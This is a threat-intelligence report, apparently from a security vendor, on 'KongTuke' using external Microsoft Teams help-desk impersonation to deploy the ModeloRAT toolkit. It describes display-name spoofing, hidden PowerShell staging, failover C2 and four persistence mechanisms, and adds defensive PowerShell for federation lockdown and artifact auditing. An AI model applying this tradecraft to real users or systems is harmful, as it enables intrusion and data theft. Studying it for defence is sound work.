Editor’s note: This report was authored by Thassanai McCabe and Debarshi Ghosh.
Key Points
Financially motivated initial access broker (IAB) “KongTuke” has moved to external Microsoft Teams chats for initial access—the first time we’ve seen the group use a collaboration platform instead of its earlier web-only “ClickFix” delivery.
The “ModeloRAT” toolkit that’s ultimately deployed is built to survive disruption, with three independent command-and-control (C2) paths on separate infrastructure as well as persistence spread across four triggers. This means cutting one channel or artifact still leaves access in place.
Active since at least April 2026, the chain reaches persistent access within five minutes of a user pasting a single PowerShell command.
To counter KongTuke, restrict external Teams federation to a trusted organization allowlist and hunt for portable Python under %APPDATA%\Roaming\WPy64-*.
Threat actors are impersonating help-desk staff over external Microsoft Teams chats to trick victims into deploying "ModeloRAT" on their own machines. ReliaQuest attributes the activity to financially motivated initial access broker (IAB) "KongTuke" based on reuse of the group's custom Python loader. Previously, KongTuke has compromised WordPress sites to host "ClickFix" and "CrashFix" lures and paste-and-run prompts on fake CAPTCHA or browser-crash pages for access that has historically fed ransomware affiliates. This Teams activity, which appears to add to, rather than replace, that web-based approach, marks the first time we’ve seen KongTuke use a collaboration platform for initial access. In the incidents we investigated, a single external Teams chat moved the operator from cold outreach to a persistent foothold in under five minutes.
Since April 2026, KongTuke has used the same support-themed pretext popularized by ransomware group "Black Basta," which is now defunct but whose technique is still widely copied. Help-desk impersonation is likely becoming the collaboration-platform counterpart of traditional email-based phishing. The tactic is widespread because it’s effective, and as it continues to see success, more actors will likely adopt it. Where Black Basta leaned on a fast ransomware executable, KongTuke is deploying an updated ModeloRAT toolkit with redundant command and control (C2), server failover, and layered persistence, which is closer to the durable-foothold pattern seen in our recent PySoxy reporting than to a smash-and-grab.
Across 45 days, the operator rotated through five Microsoft 365 tenants to blunt reactive blocking, and persistence was spread across four separate triggers. This means that cutting one channel or artifact still leaves access elsewhere.
Read on to learn:
How a single Teams chat reached persistent access in under five minutes
Why blocking one C2 channel, or one URL pattern, left the attacker still inside
The fourth persistence mechanism standard remediation almost always misses
Why External Chat Works as an Initial-Access Channel
KongTuke’s shift to Teams matters more than the malware itself. Plenty of threat actors abuse Teams, but most are opportunistic; KongTuke has deliberately moved a working web-based operation onto the platform, which likely signals where this tradecraft is headed. For defenders, it means a control gap many organizations have not yet closed: External chat is now an initial-access channel on par with email but is rarely governed like one. There are three reasons KongTuke likely made the move.
Lower friction than email: Email delivery is becoming more difficult for attackers as secure email gateways, domain-authentication enforcement, and impersonation-detection controls continue to raise the bar. ClickFix, the group’s earlier lure, sidestepped some of those defenses by moving the social-engineering step into the browser through paste-and-run prompts on fake CAPTCHA or browser-crash pages. But it still relied on driving users to a malicious page via search results, malvertising, or email links, which are all channels defenders monitor closely.
Trust by interface: A direct chat from an external tenant appears in the same interface employees use every day, and it feels internal, conversational, and low risk. Years of phishing training have conditioned employees to scrutinize email; few apply the same scrutiny to a chat. In many Microsoft 365 environments, external chat is broadly allowed unless explicitly restricted, giving attackers a direct line to users with minimal overhead.
Disposable infrastructure: Registering a Microsoft 365 tenant is fast and cheap, and in this campaign the operator rotated through five tenants in 45 days. By the time one sender domain reaches a block list, the actor is usually already on the next. The most reliable control is tighter governance over which outside organizations can message users in the first place.
Taken together, these three factors give KongTuke a delivery channel that’s easier to reach, more trusted on arrival, and cheaper to replace than anything in its earlier web-only approach. That matters because, once a user engages, what lands on the host is a toolkit built for survivability.
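The governance control called out above, moving external Teams federation from open federation to a trusted-organization allowlist, as an added example that is not part of the report. It assumes the MicrosoftTeams PowerShell module and a Teams administrator account; the partner domains are placeholders.

```powershell
# Added example (not from the report): replace open external federation with an
# explicit allowlist and verify the result. Assumes the MicrosoftTeams module is
# installed and the caller holds a Teams administrator role.
Connect-MicrosoftTeams

# Record the current posture first. AllowedDomains of type AllowAllKnownDomains
# means any Microsoft 365 tenant, including a freshly registered one, can open
# a chat with your users, which is the weak setting this campaign depends on.
$before = Get-CsTenantFederationConfiguration
$before | Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowedDomains

# Corrected setting: keep federation on, but only for named partner tenants.
# Placeholder domains; substitute the suppliers, partners and MSPs you actually trust.
$trusted = @('partner-one.example', 'msp.example')
Set-CsTenantFederationConfiguration -AllowFederatedUsers $true `
    -AllowedDomainsAsAList $trusted `
    -AllowTeamsConsumer $false

# Confirm that AllowedDomains is now an allowlist containing only the trusted entries.
$after = Get-CsTenantFederationConfiguration
$after | Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowedDomains
```

Compare the two outputs: the change has landed only when the AllowedDomains value switches from AllowAllKnownDomains to a list that contains just the trusted domains.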
Inside the Evolved ModeloRAT
ModeloRAT and WinPython are known hallmarks of KongTuke, observed across the group's ClickFix and CrashFix campaigns. The version we observed in this campaign evolves that toolchain in three concrete ways: The C2 layer now uses a five-server pool with sequential failover, two additional Python remote-access trojan (RAT) modules run on separate infrastructure, and persistence is layered across four triggers rather than a single Run key. The result is a toolkit built to outlast partial response.
Multiple Access Paths Complicate Containment
Disrupting one ModeloRAT component does not contain the compromise. The toolkit runs three independent access paths on separate infrastructure, each capable of continuing to function when defenders disrupt the others. Each one builds on the last, starting with the runtime that makes the rest possible.
The Carrier: Portable WinPython
The malicious activity executes under a trusted, signed binary that signature-based detection alone is unlikely to flag. The carrier is WPy64-31401, an unmodified portable WinPython release. By bundling Python with the payload, the attacker removes any dependency on the target environment having Python installed, while the signed pythonw.exe binary helps mask the activity that follows. Once the runtime is in place, the first module executes with a clear purpose: rapidly profile the host before the operator types a single command.
Reconnaissance: Pre-Staged Host Context
By the time the operator types their first command, they already know enough about the host to prioritize follow-on activity. The first module to run is the reconnaissance collector, observed under names including collector.py, games.py, and fileviewer.py. The reconnaissance collector launches hidden PowerShell to gather host and user information (including systeminfo, whoami /all, domain and group details, and Lightweight Directory Access Protocol [LDAP] enumeration using adsisearcher). The collector then writes the results to configA.json. That context is then handed off to the implant that runs the operation.
Primary Implant: Pmanager.py
The primary implant is built to outpace indicator-based defenses. Rotating servers, randomized URLs, and on-demand self-updates mean any IP address, domain, or hash captured in one incident can become outdated before defenders can apply it broadly. Pmanager.py beacons over RC4- and zlib-protected HTTP. It rotates through five hardcoded C2 servers and fails over automatically when one is blocked. Each beacon also uses randomized URL paths, making signatures tied to any single path or server unreliable. Pmanager.py also accepts a self-update command, allowing the attacker to push a new build to compromised targets mid-campaign.
A confirmed compromise should be treated as a potential data-loss event regardless of the user's role. Beyond reconnaissance and shell access, the toolkit can capture screenshots and exfiltrate arbitrary files on operator command. Files are sent in single uncompressed POSTs with no size limit—a 500MB database could leave the host in a single HTTP request. Even with the primary implant disrupted, the operator doesn’t lose access; two additional modules are designed to take over.
Fallback Access: Two Independent Backdoors
Blocking one channel is not containment. Beyond the primary implant, KongTuke deploys two fallback access modules, each running on separate attacker infrastructure. The result is three independent access paths into a compromised host: a primary RAT, a secondary reverse shell, and a raw TCP backdoor. Each path runs on separate infrastructure and can stay live when the others are cut. Standard incident response, which often stops after disrupting the most visible channel, can leave the operator inside.
Persistence That Outlasts Standard Cleanup
Across incidents, we observed the same persistence chain on every infected host: Three artifacts working together to ensure execution at logon, with a fourth mechanism appearing on hosts that received post-exploitation tasking.
The Baseline Three Artifacts
On every infected host, three persistence artifacts were present:
A registry Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, often named MonitoringService to blend in with legitimate enterprise tools.
A Startup folder shortcut named StartManagerB.lnk, which pointed to the VBScript wrapper below.
A VBScript launcher (scriptA.vbs) in %APPDATA%\WPy64-31401\python, which in turn launched pythonw.exe and the main RAT module.
The Run key and the Startup shortcut are two independent triggers, but both ultimately route through the same VBScript launcher, which is what gives the chain its layered character at the trigger level while keeping a single execution path.
The Fourth Mechanism: SYSTEM-Level Scheduled Task
On hosts that received post-exploitation tasking, we observed a fourth mechanism: A SYSTEM-level scheduled task registered to run daily at midnight, with a name chosen to mimic legitimate folders such as ChromeA or AdobeA. The command observed creating that task is shown below:
The /run flag makes this especially risky in the near term: The task executes as soon as it is created, while the daily midnight trigger remains in place as a backup. In our review of the ModeloRAT modules, we found that the implant's self-destruct routine removes only the Run key, Startup shortcut, and VBScript launcher. It doesn’t check for or delete the scheduled task. That means the task can persist through a reboot and remain active even after the operator has stepped away.
Before returning any affected host to production, security teams should explicitly enumerate:
Run keys
Startup folder shortcuts
%APPDATA%\WPy64-* directories
VBScript launchers tied to user-writable Python paths
Scheduled tasks running as SYSTEM with names that mimic legitimate AppData or ProgramData folders
This step is often missing from standard remediation checklists and needs to be added deliberately, because every artifact left behind is a re-entry point. For defenders, containment must address both the delivery path and every persistence artifact the chain leaves behind.
From Help-Desk Chat to Foothold: How KongTuke Gains Access
Here's how the chain unfolds, from the initial Teams message through to execution on the endpoint.
The IT Support and Help-Desk Lure
In each incident we investigated, the threat actor initiated a one-on-one Teams chat from an external Microsoft 365 tenant and impersonated internal IT or help-desk staff. To the user, the chat preview looked like a legitimate internal message: A sender called "Help Desk" or "IT Support" sitting alongside their other internal contacts. Underneath, the attacker achieved that effect by appending Unicode whitespace characters to the display name, padding it so the rendered chat preview matched what an internal contact would look like. This is effectively display-name spoofing at the platform level: The rendered name is what the user sees, not the underlying tenant or domain.
The most recently observed sender address was itsupport[at]deepminds[.]me, with a display name visually indistinguishable from a legitimate internal support contact. We observed this address across multiple customer environments, ruling out a targeted single-victim operation. All chat sessions in our telemetry originated from a single Tor proxy node, which likely points to a common operator behind the rotating tenant infrastructure described earlier.
Once the actor has established trust with the user over chat, the next step is to guide them into running the payload.
From Scripted Chat to PowerShell Execution
Once the chat is established, the attacker walks the user through a scripted social engineering sequence. The pretext varies—account lockout, mailbox issue, or certificate error—but the user is always directed to download and run a "diagnostic tool." In the incidents we investigated, that tool was a ZIP archive hosted on a legitimate cloud file-sharing service. The archive contained a portable WinPython runtime and the ModeloRAT scripts. The user was then instructed to paste a single PowerShell command into Windows Run, which downloaded the archive, extracted it into AppData, deleted the ZIP, and launched the first Python module.
The initial execution command observed across incidents is shown below:
This command does everything needed to move from user action to execution without further interaction. It runs hidden, bypasses PowerShell execution restrictions, stages a full Python environment in a user-writable directory, and starts execution with pythonw.exe, which avoids opening a visible console window.
Persistence and the Five-Minute Clock
From that point, the rest of the chain unfolds quickly. WinPython landed in %APPDATA%\Roaming\WPy64-31401\ within 90 seconds. Within two minutes, pythonw.exe had launched the reconnaissance collector and begun spawning hidden PowerShell processes to enumerate the host. Shortly after, a second hidden PowerShell instance created persistence, and by the five-minute mark the host had begun beaconing outbound to attacker infrastructure.
The chain can survive reboots the moment persistence fires, which happens immediately after initial execution. The attacker writes a VBScript launcher to disk and creates a shortcut in the user's Startup folder, so ModeloRAT, the toolkit detailed earlier, starts again at logon. The command observed creating that persistence is shown below:
The chain writes a VBScript wrapper (scriptA.vbs) and a Startup folder shortcut (StartManagerB.lnk) that relaunch Pmanager.py through the bundled Python runtime each time the user logs on. The added six-second delay before Python execution can help the chain survive shallow sandboxing and break simple detections that rely on correlating the persistence event with the follow-on RAT launch.
In practice, that leaves very little time for manual response. By the time a Teams message is reported and reviewed, the host may already be beaconing and persistent. The defensive window is short, and the human signal that something is wrong is much weaker. That short response window matters even more because the toolkit itself is built to preserve access after the initial foothold is established.
Step Up Your Defenses Against KongTuke
ReliaQuest’s Approach
KongTuke moves from a single Teams message to persistent, modular access in under five minutes. ReliaQuest GreyMatter equips security teams to detect those behaviors as a sequence and contain them before the toolkit’s redundancy turns a single host into a recurring foothold.
GreyMatter Transit provides visibility against the behaviors observed in this campaign, where domain- and sender-based blocking falls short. Because the operator rotates Microsoft 365 tenants faster than reactive blocks can keep up, traditional indicators go stale quickly. GreyMatter Transit monitors network telemetry while it’s still in motion, surfacing the exact KongTuke patterns covered in this report.
GreyMatter Agentic AI focuses on behavior across the kill chain rather than individual signals. In this campaign, an external Teams chat from an unfamiliar tenant, a hidden PowerShell session launching from Windows Run, a portable Python runtime appearing under %APPDATA%\Roaming\WPy64-*, and a Startup folder shortcut written by pythonw.exe are low-confidence events in isolation. Correlated, they describe an active compromise; correlated at machine speed, they do so well within KongTuke's five-minute window from first contact to persistence.
ReliaQuest Detection Rules are continuously updated using the latest threat intelligence and research.
KongTuke’s five-minute path from chat to persistence leaves almost no room for manual response, and the toolkit’s three C2 paths and four persistence triggers mean partial containment still leaves access in place. The following GreyMatter Automated Response Playbooks act on our detection rules to close that window automatically, cutting the operator off across every access path before the chain can re-execute:
Isolate Endpoint: Immediately removes the affected host from the network, cutting off C2 communication across all three independent access paths described in this report and preventing the operator from issuing new commands before remediation completes.
Terminate Sessions: Invalidates active sessions on hosts where the toolkit may have already captured screenshots, exfiltrated files, or harvested credential material on operator command, shutting down the lateral and identity-based access avenues that follow the initial foothold.
Ban Hash: Prevents reinfection from malicious files KongTuke uses, including games.py, StartManagerB.lnk, and scriptA.vbs.
Your Action Plan
KongTuke moved from a single Teams chat to persistent, modular access in one user session, so defenses need to account for trusted-channel social engineering, multi-path C2, and persistence that survives standard cleanup. These recommendations target the gaps conventional controls often leave exposed:
Restrict External Teams Federation Now: External Teams chat is the entry point that makes this campaign work, and tenant rotation makes sender- and domain-based blocking unreliable as a sole control. Move external Teams federation to a trusted-organization allowlist so unknown tenants cannot place a chat in front of users in the first place.
Hunt for Portable Python in User AppData: A WinPython installation under %APPDATA%\Roaming\WPy64-* is not standard for managed enterprise software and maps directly to ModeloRAT activity in this campaign. Treat it as a high-signal indicator and hunt for it across managed endpoints, not only on hosts already flagged for response.
Audit All Four Persistence Triggers Before Returning a Host to Production: ModeloRAT spreads persistence across the Run key, the Startup folder shortcut, and the VBScript launcher in %APPDATA%\WPy64-31401\python\. On hosts where the attacker took “hands-on-keyboard” action, such as exfiltrating files or running follow-up commands, a fourth mechanism is added: a SYSTEM-level scheduled task with an AppData- or ProgramData-style name. Treat any host with confirmed operator activity as having all four, enumerate each one, and remove every survivor, because a single remaining trigger is enough for the chain to re-execute at next logon.
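The enumeration described in the persistence section (Run keys, Startup shortcuts, WPy64-* directories, VBScript launchers, SYSTEM tasks with folder-style names) and repeated in the action plan above, as an added audit script that is not part of the report or of the ModeloRAT toolkit. It assumes PowerShell 5.1 or later running as an administrator so other users' hives and SYSTEM tasks are readable; the artifact names come from the report, while the matching heuristics (regexes, the trailing-letter rule for task names) are my own and should be tuned per environment.

```powershell
# Added example (not from the report): audit the four ModeloRAT persistence triggers
# plus the WinPython staging directory on the local host before it returns to production.
# Artifact names (WPy64-*, scriptA.vbs, StartManagerB.lnk, MonitoringService, ChromeA/AdobeA)
# come from the report; every matching heuristic below is an assumption to tune locally.
function Find-ModeloRatArtifacts {
    $findings = New-Object System.Collections.Generic.List[object]
    $add = { param($Type, $Path, $Detail)
        $findings.Add([pscustomobject]@{ Type = $Type; Path = $Path; Detail = $Detail }) }

    # Every profile's roaming AppData, because %APPDATA% only resolves for the caller
    $roots = Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming' } | Where-Object { Test-Path $_ }
    $shell = New-Object -ComObject WScript.Shell

    foreach ($root in $roots) {
        # 1. Portable WinPython dropped by the paste-and-run command (WPy64-*)
        Get-ChildItem $root -Directory -Filter 'WPy64-*' -ErrorAction SilentlyContinue | ForEach-Object {
            & $add 'WinPythonDir' $_.FullName ''
            # 2. VBScript launchers (scriptA.vbs) inside the user-writable Python path
            Get-ChildItem $_.FullName -Recurse -Filter '*.vbs' -ErrorAction SilentlyContinue |
                ForEach-Object { & $add 'VbsLauncher' $_.FullName '' }
        }
        # 3. Startup shortcuts (StartManagerB.lnk) whose target is a script host or AppData binary
        $startup = Join-Path $root 'Microsoft\Windows\Start Menu\Programs\Startup'
        Get-ChildItem $startup -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
            $lnk = $shell.CreateShortcut($_.FullName)
            $target = "$($lnk.TargetPath) $($lnk.Arguments)"
            if ($target -match 'AppData|\.vbs|wscript|pythonw') { & $add 'StartupLnk' $_.FullName $target }
        }
    }

    # 4. Run keys in every loaded user hive (the report's MonitoringService pointed at the VBScript)
    if (-not (Test-Path 'HKU:\')) { New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null }
    Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | ForEach-Object {
        $runKey = "$($_.PSPath)\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $runKey)) { return }
        (Get-ItemProperty $runKey).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' -and "$($_.Value)" -match 'AppData|\.vbs|wscript|pythonw' } |
            ForEach-Object { & $add 'RunKey' "$runKey\$($_.Name)" "$($_.Value)" }
    }

    # 5. SYSTEM tasks named after a real ProgramData/AppData folder, optionally with one
    #    trailing capital letter (ChromeA -> Chrome), or whose action runs from a user profile
    $folderNames = @(Get-ChildItem 'C:\ProgramData' -Directory -ErrorAction SilentlyContinue).Name
    foreach ($root in $roots) { $folderNames += @(Get-ChildItem $root -Directory -ErrorAction SilentlyContinue).Name }
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { $_.Principal.UserId -match 'SYSTEM|S-1-5-18$' } | ForEach-Object {
            $base = $_.TaskName -creplace '[A-Z]$', ''   # -creplace keeps the match case-sensitive
            $cmd  = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
            if ($folderNames -contains $base -or $cmd -match 'Users\\[^\\]+\\AppData|pythonw|wscript') {
                & $add 'SystemTask' "$($_.TaskPath)$($_.TaskName)" $cmd
            }
        }
    return $findings
}

$results = @(Find-ModeloRatArtifacts)
if ($results.Count -eq 0) { 'No ModeloRAT-style persistence artifacts found.' }
else { $results | Sort-Object Type | Format-Table -AutoSize -Wrap }
```

A host is only clean when all five categories come back empty; a single surviving RunKey, StartupLnk, VbsLauncher or SystemTask finding is enough for the chain to relaunch at the next logon or midnight trigger.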
Those defensive steps address the current campaign, but the broader lesson is that KongTuke’s shift to Teams is likely part of a wider change in how this activity will develop.
Key Takeaways and What's Next
KongTuke has likely crossed from passive web targeting into active person-to-person social engineering, adopted a Black Basta-style help-desk playbook, and rolled out a toolkit whose three C2 paths and four persistence triggers leave it well positioned to survive partial response. Coverage needs to be behavior-based and built for the shift in trust this campaign represents.
Compromised trusted tenants will likely replace disposable tenants in some operations. In this campaign, KongTuke rotated across five Microsoft 365 tenants in 45 days. If more organizations move to federation allowlists, the next logical adaptation is to send the same lure from a compromised supplier, partner, or managed service provider tenant already trusted by the target.
The help-desk pretext is highly likely to spread to other enterprise chat platforms. The advantage in this campaign was not unique to Teams itself; it was the use of a chat channel employees are less trained to question than email. If defenders tighten Teams federation, the same approach could move to Slack, Zoom Team Chat, or Webex environments that still permit broad external messaging.
Persistence is likely to become more cleanup-resistant, not less. The current ModeloRAT chain already spreads persistence across multiple artifacts and, in some cases, a scheduled task that standard remediation may miss. That emphasis on survivability suggests future changes are at least as likely to focus on staying power after execution as on new delivery mechanisms.
Three Takeaways to Act On
Govern external collaboration channels with the same rigor as email. Monitoring alone will not catch this pretext.
Treat single-channel containment as incomplete by default. Three C2 paths and four persistence triggers mean blocking one tells you nothing about remaining access.
Build detection around behavior, not indicators. Tenants, IPs, and URL paths rotate faster than reactive blocking can keep up.
IOCs